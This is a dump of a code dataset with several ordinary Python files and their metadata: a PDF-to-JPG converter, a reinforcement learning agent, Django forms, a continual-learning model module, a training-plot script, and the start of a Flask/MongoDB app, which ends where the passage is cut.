seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22604148885 | import os
import pypdfium2 as pdfium

# Collect the absolute paths of all PDF files in the current directory.
files = []
for file in os.listdir('.'):
    # split the file name and get the extension
    extension = os.path.splitext(file)[1]
    if extension == '.pdf':
        files.append(os.path.abspath(file))

# Render every page of each PDF into a per-document output directory.
for filepath in files:
    filename = os.path.basename(filepath)
    filename = os.path.splitext(filename)[0]
    pdf = pdfium.PdfDocument(filepath)
    page_indices = [i for i in range(len(pdf))]
    # NOTE(review): render_to/BitmapConv is the pre-4.x pypdfium2 API —
    # confirm the installed pypdfium2 version still provides it.
    renderer = pdf.render_to(pdfium.BitmapConv.pil_image, page_indices=page_indices)
    if not os.path.exists(filename):
        # make a directory to store the images with the same name as the pdf file
        os.mkdir(filename)
    # The original guard `os.getcwd() != filename` compared an absolute path
    # with a bare directory name and was therefore always true; descend
    # unconditionally (the trailing chdir('..') returns to the parent).
    os.chdir(filename)
    for image, index in zip(renderer, page_indices):
        # save each page as output_<page>.jpg inside the per-PDF directory
        image.save("output_%02d.jpg" % index)
    # change directory to the parent directory
os.chdir('..') | Lethaldroid/Python_PDF_to_JPG | pdf_to_jpeg.py | pdf_to_jpeg.py | py | 1,122 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.splitext",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
21009250510 | import math
import time
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils
from agent.sarsa import Sarsa
class GeneratorB(nn.Module):
    """MLP that predicts skill logits ``q(z | tau)`` from a trajectory encoding."""

    def __init__(self, tau_dim, skill_dim, hidden_dim):
        super().__init__()
        # tau_dim -> hidden -> hidden -> skill_dim, with ReLU in between.
        stack = [
            nn.Linear(tau_dim, hidden_dim),
            nn.ReLU(),
            nn.Linear(hidden_dim, hidden_dim),
            nn.ReLU(),
            nn.Linear(hidden_dim, skill_dim),
        ]
        self.skill_pred_net = nn.Sequential(*stack)
        self.apply(utils.weight_init)

    def forward(self, tau):
        # Return unnormalised skill logits for the given trajectory encoding.
        return self.skill_pred_net(tau)
class Discriminator(nn.Module):
    """Embedding network plus SimCLR-style projection head for the contrastive loss."""

    def __init__(self, tau_dim, feature_dim, hidden_dim):
        super().__init__()
        # Backbone: trajectory encoding -> feature embedding.
        self.embed = nn.Sequential(
            nn.Linear(tau_dim, hidden_dim),
            nn.ReLU(),
            nn.Linear(hidden_dim, hidden_dim),
            nn.ReLU(),
            nn.Linear(hidden_dim, feature_dim),
        )
        # Projection head applied on top of the embedding.
        self.project_head = nn.Sequential(
            nn.Linear(feature_dim, hidden_dim),
            nn.ReLU(),
            nn.Linear(hidden_dim, feature_dim),
        )
        self.apply(utils.weight_init)

    def forward(self, tau):
        # Embed, then project into the contrastive feature space.
        return self.project_head(self.embed(tau))
class OURCAgent(Sarsa):
    # Tabular Sarsa agent augmented with skill discovery: a generator network
    # q(z | tau) plus a contrastive (InfoNCE) discriminator jointly provide an
    # intrinsic reward that is used to fill the Q-table.
    def __init__(self, contrastive_scale,
                 update_encoder, contrastive_update_rate,skill_dim, temperature, update_skill_every_step,
                 **kwargs):
        self.skill_dim = skill_dim
        # Expose the skill one-hot to the base agent as extra meta dimensions.
        kwargs["meta_dim"] = self.skill_dim
        super().__init__(**kwargs)
        self.contrastive_scale = contrastive_scale
        self.update_encoder = update_encoder
        self.batch_size = kwargs['batch_size']
        self.contrastive_update_rate = contrastive_update_rate
        self.temperature = temperature
        self.update_skill_every_step = update_skill_every_step
        self.tau_len = update_skill_every_step
        # create ourc
        self.gb = GeneratorB(self.obs_dim - self.skill_dim, self.skill_dim,
                             kwargs['hidden_dim']).to(kwargs['device'])
        self.discriminator = Discriminator(self.obs_dim - self.skill_dim,
                                           self.skill_dim,
                                           kwargs['hidden_dim']).to(kwargs['device'])
        # loss criterion
        self.gb_criterion = nn.CrossEntropyLoss()
        self.discriminator_criterion = nn.CrossEntropyLoss()
        # optimizers
        self.gb_opt = torch.optim.Adam(self.gb.parameters(), lr=self.lr)
        self.dis_opt = torch.optim.Adam(self.discriminator.parameters(), lr=self.lr)
        self.gb.train()
        self.discriminator.train()
        # Index of the skill currently being executed (advanced round-robin).
        self.skill_ptr = 0

    def init_meta(self):
        """Return a meta dict containing the current skill as a one-hot vector."""
        skill = np.zeros(self.skill_dim, dtype=np.float32)
        skill[self.skill_ptr] = 1
        meta = OrderedDict()
        meta['skill'] = skill
        return meta

    def update_meta(self, meta, global_step, time_step, finetune=False):
        """Rotate to the next skill every ``update_skill_every_step`` steps."""
        if global_step % self.update_skill_every_step == 0:
            self.skill_ptr = (self.skill_ptr + 1) % self.skill_dim
            return self.init_meta()
        return meta

    def update_gb(self, skill, gb_batch, step):
        """One gradient step training q(z | tau) to classify the active skill."""
        metrics = dict()
        labels = torch.argmax(skill, dim=1)
        loss, df_accuracy = self.compute_gb_loss(gb_batch, labels)
        self.gb_opt.zero_grad()
        loss.backward()
        self.gb_opt.step()
        # NOTE(review): loss/df_accuracy are computed but never added to
        # `metrics`, so the returned dict is always empty — confirm intended.
        return metrics

    def update_contrastive(self, taus, skills):
        """One gradient step on the InfoNCE contrastive discriminator loss."""
        metrics = dict()
        features = self.discriminator(taus)
        loss = self.compute_info_nce_loss(features, skills)
        loss = torch.mean(loss)
        metrics['loss'] = loss.item()
        self.dis_opt.zero_grad()
        loss.backward()
        self.dis_opt.step()
        return metrics

    def compute_intr_reward(self, skills, tau_batch, metrics):
        """Intrinsic reward: log q(z | tau) bonus plus scaled contrastive term."""
        # compute q(z | tau) reward
        d_pred = self.gb(tau_batch)
        d_pred_log_softmax = F.log_softmax(d_pred, dim=1)
        _, pred_z = torch.max(d_pred_log_softmax, dim=1, keepdim=True)
        # Log-likelihood of the true skill minus the log of a uniform prior.
        gb_reward = d_pred_log_softmax[torch.arange(d_pred.shape[0]), torch.argmax(skills, dim=1)] - math.log(
            1 / self.skill_dim)
        gb_reward = gb_reward.reshape(-1, 1)
        # compute contrastive reward
        features = self.discriminator(tau_batch)
        # maximize softmax item
        contrastive_reward = torch.exp(-self.compute_info_nce_loss(features, skills))
        intri_reward = gb_reward + contrastive_reward * self.contrastive_scale
        return intri_reward

    def compute_info_nce_loss(self, features, skills):
        """InfoNCE loss where samples sharing a skill are treated as positives."""
        size = features.shape[0] // self.skill_dim
        labels = torch.argmax(skills, dim=1)
        # Pairwise mask: 1 where two samples belong to the same skill.
        labels = (labels.unsqueeze(0) == labels.unsqueeze(1)).long()
        labels = labels.to(self.device)
        features = F.normalize(features, dim=1)
        similarity_matrix = torch.matmul(features, features.T)
        # discard the main diagonal from both: labels and similarities matrix
        mask = torch.eye(labels.shape[0], dtype=torch.bool).to(self.device)
        labels = labels[~mask].view(labels.shape[0], -1)
        similarity_matrix = similarity_matrix[~mask].view(similarity_matrix.shape[0], -1)
        similarity_matrix = torch.exp(similarity_matrix / self.temperature)
        # don't limit update for all negative
        pick_one_positive_sample_idx = torch.argmax(labels, dim=-1, keepdim=True)
        pick_one_positive_sample_idx = torch.zeros_like(labels).scatter_(-1, pick_one_positive_sample_idx, 1)
        neg = (~labels.bool()).long()
        # select one and combine multiple positives
        positives = torch.sum(similarity_matrix * pick_one_positive_sample_idx, dim=-1, keepdim=True)
        negatives = torch.sum(similarity_matrix * neg, dim=-1, keepdim=True)
        loss = -torch.log(positives / negatives)
        return loss

    def compute_gb_loss(self, taus, skill):
        """
        DF Loss: cross-entropy of the skill prediction plus arg-max accuracy.
        """
        d_pred = self.gb(taus)
        d_pred_log_softmax = F.log_softmax(d_pred, dim=1)
        _, pred_z = torch.max(d_pred_log_softmax, dim=1, keepdim=True)
        d_loss = self.gb_criterion(d_pred, skill)
        # Fraction of samples whose arg-max prediction matches the true skill.
        df_accuracy = torch.sum(
            torch.eq(skill,
                     pred_z.reshape(1,
                                    list(
                                        pred_z.size())[0])[0])).float() / list(
            pred_z.size())[0]
        return d_loss, df_accuracy

    def update(self, buffer, step):
        """Full training step: contrastive + generator updates, then tabular Sarsa."""
        metrics = dict()
        start = time.time()
        if step % self.update_every_steps != 0:
            return metrics
        batch = buffer.sample_batch(1024)
        obs, next_obs, action, rew, done, skill, next_skill = utils.to_torch(batch.values(), self.device)
        metrics.update(self.update_contrastive(next_obs, skill))
        # Extra contrastive steps on fresh batches (rate - 1 additional passes).
        for i in range(self.contrastive_update_rate - 1):
            batch = buffer.sample_batch(1024)
            obs, next_obs, action, rew, done, skill, next_skill = utils.to_torch(batch.values(), self.device)
            metrics.update(self.update_contrastive(next_obs, skill))
        # update q(z | tau)
        # bucket count for less time spending
        metrics.update(self.update_gb(skill, next_obs, step))
        # compute intrinsic reward
        with torch.no_grad():
            intr_reward = self.compute_intr_reward(skill, next_obs, metrics)
        metrics["reward"] = intr_reward.mean().item()
        if not self.update_encoder:
            obs = obs.detach()
            next_obs = next_obs.detach()
        # Convert tensors to integer indices for the tabular Q update.
        action = action.cpu().numpy().astype('int').flatten()
        obs = obs.cpu().numpy().astype('int').flatten()
        next_obs = next_obs.cpu().numpy().astype('int').flatten()
        next_action = self.act(next_obs, skill).flatten()
        skill = torch.argmax(skill, dim=1).cpu().numpy()
        intr_reward = intr_reward.cpu().numpy().flatten()
        # Sarsa TD update driven by the intrinsic reward.
        td_error = intr_reward + self.gamma * self.Q_table[next_obs, skill, next_action] - \
            self.Q_table[obs, skill, action]
        self.Q_table[obs, skill, action] += self.alpha * td_error
        end = time.time()
        if step % 10000 == 0:
            print("on step : ",step, metrics, "update_time:", end-start)
        return metrics
| Rooshy-yang/Four_Room_For_Exploartion | agent/ourc.py | ourc.py | py | 8,693 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
8503125846 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Thread, Post
class MySignUpForm(UserCreationForm):
    # Registration form extending Django's UserCreationForm with optional
    # first/last name fields and a required e-mail address.
    # Labels and help texts are in Polish ('Nie wymagane' = 'Not required').
    # imie_i_nazwisko = forms.CharField(max_length=100, required=False, help_text='Nie wymagane')
    first_name = forms.CharField(label='Imię', max_length=100, required=False, help_text='Nie wymagane')
    last_name = forms.CharField(label='Nazwisko', max_length=100, required=False, help_text='Nie wymagane')
    email = forms.EmailField(max_length=150)

    class Meta:
        model = User
        fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )

    def __init__(self, *args, **kwargs):
        super(MySignUpForm, self).__init__(*args, **kwargs)
        # Replace Django's default English help texts with Polish ones.
        self.fields['username'].help_text = 'Maksymalnie 150 znaków. Jedynie litery, cyfry i @/./+/-/_.'
        self.fields['password1'].help_text = 'Twoje hasło musi zawierać co najmniej 8 znaków. '
class ThreadForm(forms.ModelForm):
    """Form for creating a forum thread (title, category, description).

    ``Meta.fields`` was previously a set literal, which has no defined
    ordering, so rendered field order was nondeterministic; a tuple in the
    intended order fixes that (and makes the legacy ``self.fields.keyOrder``
    hack, removed in Django 1.7, unnecessary).
    """

    class Meta:
        model = Thread
        # Tuple (not a set) so the rendered field order is deterministic.
        fields = ('title', 'category_name', 'description')

    def __init__(self, *args, **kwargs):
        super(ThreadForm, self).__init__(*args, **kwargs)
        # Inline widget sizing for the create-thread template.
        self.fields['description'].widget.attrs['style'] = 'width:800px; height:150px'
        self.fields['title'].widget.attrs['style'] = 'width:600px; height:25px'
        self.fields['category_name'].widget.attrs['style'] = 'width:300px; height:25px'
        # Polish labels.
        self.fields['category_name'].label = 'Kategoria'
        self.fields['title'].label = 'Tytuł'
        self.fields['description'].label = 'Opis'
class PostForm(forms.ModelForm):
    """Form for adding a comment (``text``) to a thread."""

    class Meta:
        model = Post
        # Tuple instead of a set literal: Meta.fields should be an ordered
        # sequence, not an unordered set.
        fields = ('text',)

    def __init__(self, *args, **kwargs):
        super(PostForm, self).__init__(*args, **kwargs)
        # Polish label ('Komentarz' = 'Comment') and textarea sizing.
        self.fields['text'].label = 'Komentarz'
        self.fields['text'].widget.attrs['cols'] = 100
        self.fields['text'].widget.attrs['rows'] = 15
class ProfileUpdateForm(forms.ModelForm):
    # Profile edit form: e-mail and name fields, all optional.
    email = forms.EmailField(required=False, max_length=150)
    # imie_i_nazwisko = forms.CharField(required=False)
    first_name = forms.CharField(label='Imię', max_length=100, required=False, help_text='Nie wymagane')
    last_name = forms.CharField(label='Nazwisko', max_length=100, required=False, help_text='Nie wymagane')

    class Meta:
        model = User
        fields = ('email', 'first_name', 'last_name')
| TZdybel/Django-forum | forum/forms.py | forms.py | py | 2,532 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.forms.UserCreationForm",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.forms",
"line_number": 9,
"usage_type": "name"
},
{
"api_n... |
32413588902 | import copy
from abc import ABC, abstractmethod
from typing import Any, Callable, List, Optional, Set
import torch
from renate.models.layers import ContinualNorm
from renate.types import NestedTensors
from renate.utils.deepspeed import convert_to_tensor, recover_object_from_tensor
class RenateModule(torch.nn.Module, ABC):
    """A class for torch models with some additional functionality for continual learning.

    ``RenateModule`` derives from ``torch.nn.Module`` and provides some additional functionality
    relevant to continual learning. In particular, this concerns saving and reloading the model
    when model hyperparameters (which might affect the architecture) change during hyperparameter
    optimization. There is also functionality to retrieve internal-layer representations for use
    in replay-based CL methods.

    When implementing a subclass of ``RenateModule``, make sure to call the base class' constructor
    and provide your model's constructor arguments. Besides that, you can define a
    ``RenateModule`` just like ``torch.nn.Module``.

    Example::

        class MyMNISTMLP(RenateModule):

            def __init__(self, num_hidden: int):
                super().__init__(
                    constructor_arguments={"num_hidden": num_hidden}
                    loss_fn=torch.nn.CrossEntropyLoss()
                )
                self._fc1 = torch.nn.Linear(28*28, num_hidden)
                self._fc2 = torch.nn.Linear(num_hidden, 10)

            def forward(self, x: torch.Tensor) -> torch.Tensor:
                x = self._fc1(x)
                x = torch.nn.functional.relu(x)
                return self._fc2(x)

    The state of a ``RenateModule`` can be retrieved via the ``RenateModule.state_dict()`` method,
    just as in ``torch.nn.Module``. When reloading a ``RenateModule`` from a stored state dict, use
    ``RenateModule.from_state_dict``. It will automatically recover the hyperparameters and
    reinstantiate your model accordingly.

    Note: Some methods of ``RenateModule`` accept an optional ``task_id`` argument. This is in
    anticipation of future methods for continual learning scenarios where task identifiers are
    provided. It is currently not used.

    Args:
        constructor_arguments: Arguments needed to instantiate the model.
    """

    def __init__(self, constructor_arguments: dict):
        super(RenateModule, self).__init__()
        # Deep copy so later mutation by the caller cannot corrupt the
        # arguments needed to re-instantiate the model from a state dict.
        self._constructor_arguments = copy.deepcopy(constructor_arguments)
        self._tasks_params_ids: Set[str] = set()
        # Cache of intermediate activations, populated by registered hooks.
        self._intermediate_representation_cache: List[torch.Tensor] = []
        self._hooks: List[Callable] = []

    @classmethod
    def from_state_dict(cls, state_dict):
        """Load the model from a state dict.

        Args:
            state_dict: The state dict of the model. This method works under the assumption that
                this has been created by `RenateModule.state_dict()`.
        """
        extra_state = recover_object_from_tensor(state_dict["_extra_state"])
        constructor_arguments = extra_state["constructor_arguments"]
        model = cls(**constructor_arguments)
        # Recreate task-specific parameters before loading weights.
        for task in extra_state["tasks_params_ids"]:
            model.add_task_params(task)
        # TODO: See https://github.com/awslabs/Renate/issues/236.
        # There are changes to the `class_means` or `componenets` of a model
        # that are not loaded, and should probably not be stored.
        model.load_state_dict(state_dict, strict=False)
        return model

    def get_extra_state(self, encode: bool = True) -> Any:
        """Get the constructor_arguments, and task ids necessary to reconstruct the model."""
        extra_state = {
            "constructor_arguments": self._constructor_arguments,
            "tasks_params_ids": self._tasks_params_ids,
        }
        # Encoded as a tensor so it survives torch's state-dict serialization.
        return convert_to_tensor(extra_state) if encode else extra_state

    def set_extra_state(self, state: Any, decode: bool = True):
        """Extract the content of the ``_extra_state`` and set the related values in the module."""
        extra_state = recover_object_from_tensor(state) if decode else state
        self._constructor_arguments = extra_state["constructor_arguments"]
        self._tasks_params_ids = extra_state["tasks_params_ids"]

    @abstractmethod
    def forward(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
        """Performs a forward pass on the inputs and returns the predictions.

        This method accepts a task ID, which may be provided by some continual learning scenarios.
        As an example, the task id may be used to switch between multiple output heads.

        Args:
            x: Input(s) to the model. Can be a single tensor, a tuple of tensor, or a dictionary
                mapping strings to tensors.
            task_id: The identifier of the task for which predictions are made.

        Returns:
            The model's predictions.
        """
        pass

    def get_params(self, task_id: Optional[str] = None) -> List[torch.nn.Parameter]:
        """User-facing function which returns the list of parameters.

        If a ``task_id`` is given, this should return only parameters used for the specific task.

        Args:
            task_id: The task id for which we want to retrieve parameters.
        """
        # Base implementation ignores task_id and returns all parameters.
        return list(self.parameters())

    def _add_task_params(self, task_id: str) -> None:
        """Adds new parameters, associated to a specific task, to the model.

        The method should not modify modules created in previous calls, beyond the ones defined
        in ``self._add_task_params()``. The order of the calls is not guaranteed when the model
        is loaded after being saved.

        Args:
            task_id: The task id for which the new parameters are added.
        """
        pass

    def add_task_params(self, task_id: Optional[str] = None) -> None:
        """Adds new parameters, associated to a specific task, to the model.

        This function should not be overwritten; use ``_add_task_params`` instead.

        Args:
            task_id: The task id for which the new parameters are added.
        """
        # Idempotent: a task already registered is silently skipped.
        if task_id in self._tasks_params_ids:
            return
        self._add_task_params(task_id)
        self._tasks_params_ids.add(task_id)

    def get_logits(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
        """Returns the logits for a given pair of input and task id.

        By default, this method returns the output of the forward pass. This may be overwritten
        with custom behavior, if necessary.

        Args:
            x: Input(s) to the model. Can be a single tensor, a tuple of tensor, or a dictionary
                mapping strings to tensors.
            task_id: The task id.
        """
        return self.forward(x, task_id)

    def get_intermediate_representation(self) -> List[torch.Tensor]:
        """Returns the cached intermediate representation."""
        return self._intermediate_representation_cache

    def replace_batch_norm_with_continual_norm(self, num_groups: int = 32) -> None:
        """Replaces every occurrence of batch normalization with continual normalization.

        Pham, Q., Liu, C., & Hoi, S. (2022). Continual normalization: Rethinking batch
        normalization for online continual learning. arXiv preprint arXiv:2203.16102.

        Args:
            num_groups: Number of groups when considering the group normalization in continual
                normalization.
        """

        def _replace(module):
            for name, child in module.named_children():
                # NOTE(review): `not list(module.children())` is always False
                # inside this loop (module necessarily has children here), so
                # the recursive call never fires and BatchNorm layers nested
                # deeper than one level appear to be missed — verify intent.
                if not list(module.children()):
                    _replace(child)
                if isinstance(
                    child, (torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d)
                ):
                    # Swap in ContinualNorm, preserving the BN hyperparameters.
                    setattr(
                        module,
                        name,
                        ContinualNorm(
                            num_features=child.num_features,
                            eps=child.eps,
                            momentum=child.momentum,
                            affine=child.affine,
                            track_running_stats=child.track_running_stats,
                            num_groups=num_groups,
                        ),
                    )

        _replace(self)

    def _intermediate_representation_caching_hook(self) -> Callable:
        """Hook to cache intermediate representations during training."""

        def hook(m: torch.nn.Module, _, output: torch.Tensor) -> None:
            # Only cache while the hooked module is in training mode.
            if m.training:
                self._intermediate_representation_cache.append(output)

        return hook

    def register_intermediate_representation_caching_hook(self, module: torch.nn.Module) -> None:
        """Add a hook to cache intermediate representations during training.

        Store the reference to the hook to enable its removal.

        Args:
            module: The module to be hooked.
        """
        hook = module.register_forward_hook(self._intermediate_representation_caching_hook())
        self._hooks.append(hook)

    def deregister_hooks(self) -> None:
        """Remove all the hooks that were registered."""
        for hook in self._hooks:
            hook.remove()
        self._hooks = []
        self.reset_intermediate_representation_cache()

    def reset_intermediate_representation_cache(self) -> None:
        """Resets the intermediate representation cache."""
        self._intermediate_representation_cache = []
class RenateWrapper(RenateModule):
    """A simple wrapper around a torch model.

    If you are using a torch model with fixed hyperparameters, you can use this wrapper to expose
    it as a ``RenateModule``. In this case, do _not_ use the ``from_state_dict`` method but
    reinstantiate the model, wrap it, and call ``load_state_dict``. If a tuple or a dictionary of
    tensors is passed to the `RenateWrapper`'s forward function, it is unpacked before passing it
    to the torch model's forward function.

    Example::

        my_torch_model = torch.nn.Linear(28*28, 10)  # Instantiate your torch model.
        model = RenateWrapper(my_torch_model)
        state_dict = torch.load("my_state_dict.pt")
        model.load_state_dict(state_dict)

    Args:
        model: The torch model to be wrapped.
    """

    def __init__(self, model: torch.nn.Module) -> None:
        # No constructor arguments recorded: reconstruction happens by
        # re-wrapping a freshly built torch model (see class docstring).
        super().__init__(constructor_arguments={})
        self._model = model

    def forward(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
        # Unpack tuple/dict inputs into positional/keyword arguments.
        if isinstance(x, torch.Tensor):
            outputs = self._model(x)
        elif isinstance(x, tuple):
            outputs = self._model(*x)
        elif isinstance(x, dict):
            outputs = self._model(**x)
        else:
            raise TypeError(f"Expected tensor or tuple/dict of tensors; found {type(x)}.")
        # Unwrap a one-element tuple output — presumably for wrapped models
        # that return their result inside a tuple; verify against callers.
        if isinstance(outputs, tuple) and len(outputs) == 1:
            return outputs[0]
        else:
            return outputs

    @classmethod
    def from_state_dict(cls, state_dict):
        # Deliberately unsupported: the wrapped model cannot be reconstructed
        # from constructor arguments alone.
        raise NotImplementedError(
            "RenateWrapper does not support `from_state_dict`. Instantiate the object using the "
            "standard constructor, then call `load_state_dict`."
        )
| awslabs/Renate | src/renate/models/renate_module.py | renate_module.py | py | 11,332 | python | en | code | 251 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "abc.ABC",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "copy.deepcopy",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "typing.Set",
"line_number": 5... |
5555921496 | """
Created on October 19, 2018
@author: mae-ma
@attention: evaluation of the architectures
@contact: albus.marcel@gmail.com (Marcel Albus)
@version: 1.3.1
#############################################################################################
History:
- v1.3.1: cleanup
- v1.3.0: plot for q-vals
- v1.2.1: change filenames
- v1.2.0: use smoothed score output for better visualization
- v1.1.1: use relative paths
- v1.1.0: add click commands
- v1.0.0: first init
"""
import numpy as np
from matplotlib import pyplot as plt
import pickle
import yaml
import shutil
import os
import click
import datetime
def smooth(x, window_len=11, window='hanning'):
    """smooth the data using a window with requested size.

    This method is based on the convolution of a scaled window with the signal.
    The signal is prepared by introducing reflected copies of the signal
    (with the window size) in both ends so that transient parts are minimized
    in the beginning and end part of the output signal.

    input:
        x: the input signal (1-D numpy array)
        window_len: the dimension of the smoothing window; should be an odd integer
        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett',
            'blackman'; a flat window will produce a moving average smoothing.

    output:
        the smoothed signal

    example:

        t = linspace(-2, 2, 0.1)
        x = sin(t) + randn(len(t)) * 0.1
        y = smooth(x)

    see also:

    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve
    scipy.signal.lfilter

    TODO: the window parameter could be the window itself if an array instead of a string
    NOTE: length(output) != length(input), to correct this: return
        y[(window_len/2-1):-(window_len/2)] instead of just y.
    """
    if x.ndim != 1:
        raise ValueError("smooth only accepts 1 dimension arrays.")
    if x.size < window_len:
        raise ValueError("Input vector needs to be bigger than window size.")
    if window_len < 3:
        # Window too small to smooth anything; return the input unchanged.
        return x
    if window not in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:
        raise ValueError(
            "Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'")
    # Reflect the signal at both ends to reduce boundary transients.
    s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]
    if window == 'flat':  # moving average
        w = np.ones(window_len, 'd')
    else:
        # Look the window function up on the numpy module instead of eval().
        w = getattr(np, window)(window_len)
    # Normalize the window so its coefficients sum to 1.
    y = np.convolve(w/w.sum(), s, mode='valid')
    return y
class Evaluation:
    # Collects training artefacts (reward log, DQN config, model description)
    # from the current working directory, plots loss/score curves, and backs
    # everything up into a timestamped results folder.

    def __init__(self):
        # src_filepath = home/mae-ma/git/safety
        # self.src_filepath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        self.src_filepath = os.getcwd()
        self.plot_filename = None
        # NOTE(review): yaml.load without an explicit Loader is deprecated and
        # unsafe on untrusted input — consider yaml.safe_load.
        with open(os.path.join(self.src_filepath, 'reward.yml'), 'r') as file:
            self.reward = yaml.load(file)
        with open(os.path.join(os.path.join(self.src_filepath, 'architectures'), 'config_dqn.yml'), 'r') as file:
            self.dqn_config = yaml.load(file)
        with open(os.path.join(self.src_filepath, 'model.yml'), 'r') as file:
            self.model = yaml.load(file)
        # Results live next to the package root, in a 'results' directory.
        self.tgt_filepath = os.path.join(os.path.dirname(
            os.path.dirname(__file__)), 'results')
        if not os.path.exists(self.tgt_filepath):
            os.makedirs(self.tgt_filepath)

    def plot(self):
        # Plot smoothed loss (CSV training log) and smoothed scores
        # (reward.yml), then save the figure under a config-derived name.
        print('–'*50)
        print('Plot "reward.yml"')
        csv_path = os.path.join(os.getcwd(), 'training_log_DQN.csv')
        self.csv = np.genfromtxt(csv_path, delimiter=',')
        # Column 2 of the training log is the loss; 31-sample smoothing window.
        smoothed = smooth(self.csv[:, 2], 31)
        fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(12, 12))
        ax1.plot([_ for _ in range(len(smoothed))],
                 smoothed, 'b', label='loss')
        ax1.set_ylabel('Loss')
        # reward.yml holds (score, step) pairs.
        score_value = [x[0] for x in self.reward]
        score_time = [x[1] for x in self.reward]
        ax2.plot(score_time, smooth(np.array(score_value), 11)[:-10], 'r', label='scores')
        ax2.set_xlabel('Steps')
        ax2.set_ylabel('Scores')
        ax1.set_xlim([- len(smoothed)*.05, len(smoothed)*1.05])
        ax2.set_xlim([- len(smoothed)*.05, len(smoothed)*1.05])
        ax2.legend()
        ax1.legend()
        ax2.grid()
        ax1.grid()
        fig.tight_layout()
        # Encode learning rate, gamma and model layout into the file name,
        # e.g. 'lr0_001-g0_99-u64.pdf'.
        if self.model['config'][0]['class_name'] == 'Conv2D':
            model = 'Conv2D'
        else:
            model = '-u' + str(self.model['config'][0]['config']['units'])
        filename = 'lr' + \
            str(self.dqn_config['learning_rate']).replace('.', '_') + \
            '-g' + str(self.dqn_config['gamma']).replace('.', '_') + \
            model + '.pdf'
        self.plot_filename = filename
        plt.savefig(filename)
        plt.show()
        print('–'*50)

    def plot_q_vals(self):
        # Plot smoothed Q values from the per-step Q-value log (figure is
        # built but not shown — plt.show() is commented out).
        csv_path = os.path.join(os.getcwd(), 'q_val_DQN.csv')
        self.csv = np.genfromtxt(csv_path, delimiter=',')
        smoothed = smooth(self.csv[:], 51)
        fig, ax1 = plt.subplots(1, 1, figsize=(12, 12))
        ax1.plot([_ for _ in range(len(smoothed))],
                 smoothed, 'b', label='Q values')
        ax1.set_ylabel('Q values')
        ax1.set_xlabel('Steps')
        plt.legend()
        plt.grid()
        # plt.show()

    def save_all(self):
        # Copy all run artefacts into a timestamped folder under results/.
        # Requires plot() to have run first so self.plot_filename is set.
        print('–'*50)
        filelist = ['weights.h5', 'target_weights.h5',
                    'reward.yml', 'replay_buffer.pkl', 'training_log_DQN.csv',
                    self.plot_filename, 'architectures/config_dqn.yml', 'model.yml']
        folder = datetime.datetime.today().strftime('%Y_%m_%d-%H_%M') + '___' + self.plot_filename
        folderpath = os.path.join(self.tgt_filepath, folder)
        print('Save all files to: ' + folderpath)
        if not os.path.exists(folderpath):
            os.makedirs(folderpath)
        for file in filelist:
            shutil.copy2(os.path.join(self.src_filepath, file), folderpath)
        print('–'*50)
@click.command()
@click.option('--plot/-no-plot', '-p/-np', default=True, help='plot the results from the "results.yaml" file')
@click.option('--save/--no-save', '-s/-ns', default=False, help='backups the files')
def main(plot, save):
    # CLI entry point: optionally plot results and/or back up the artefacts.
    # NOTE(review): the first option spells its off-switch '-no-plot' (single
    # dash), unlike '--no-save' below — confirm this is intentional.
    ev = Evaluation()
    print('src: ', ev.src_filepath)
    if plot:
        ev.plot()
        # ev.plot_q_vals()
    if save:
        ev.save_all()
if __name__ == '__main__':
main()
| maralbus/safety | architectures/evaluation.py | evaluation.py | py | 6,362 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.r_",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "numpy.ones",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "numpy.convolve",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_number"... |
31186639545 | from flask import Flask, request, jsonify
from flask_cors import CORS
from pymongo import MongoClient
import subprocess
import json
import os
app = Flask(__name__)
# Enable CORS for all routes so a browser frontend on another origin can call the API.
CORS(app)

# Load the config from config.json
with open('config/config.json') as config_file:
    config_data = json.load(config_file)

# Connect to the MongoDB database
# config_data['database'] holds the MongoDB connection string.
client = MongoClient(config_data['database'])
db = client['spotify']
collection = db['search_input']
@app.route('/search-artist', methods=['POST'])
def search_artist():
    # Record the requested artist name in MongoDB, run the Node.js fetcher,
    # and echo the artist name back to the caller as JSON.
    artist_name = request.json['artistName']
    print(artist_name)
    # Update the search_input document with the artist name
